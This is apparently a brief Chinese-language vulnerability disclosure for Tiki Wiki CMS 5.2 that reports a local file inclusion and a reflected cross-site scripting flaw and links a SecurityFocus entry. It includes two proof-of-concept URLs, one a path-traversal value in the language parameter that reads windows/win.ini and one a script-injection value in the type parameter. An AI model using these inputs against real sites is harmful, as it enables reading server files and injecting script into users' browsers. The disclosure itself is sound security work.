漏洞标题:
    ki Wiki CMS 本地文件包含和跨站脚本漏洞
    ki Wiki CMS 本地文件包含以及跨站脚本漏洞

漏洞描述:
    攻击者可以通过浏览器利用这些问题。利用一个跨站点脚本问题,攻击者必须诱使不知情的用户点击一个恶意的URI。

已发布到官网:
    http://www.securityfocus.com/bid/43507

secureshell-h elp@securityfocus.com 回信:


本地文件漏洞EXP:
    http://127.0.0.1/tiki-5.2/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini

跨站脚本漏洞演示:
    http://127.0.0.1/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(0)%3C/script%3E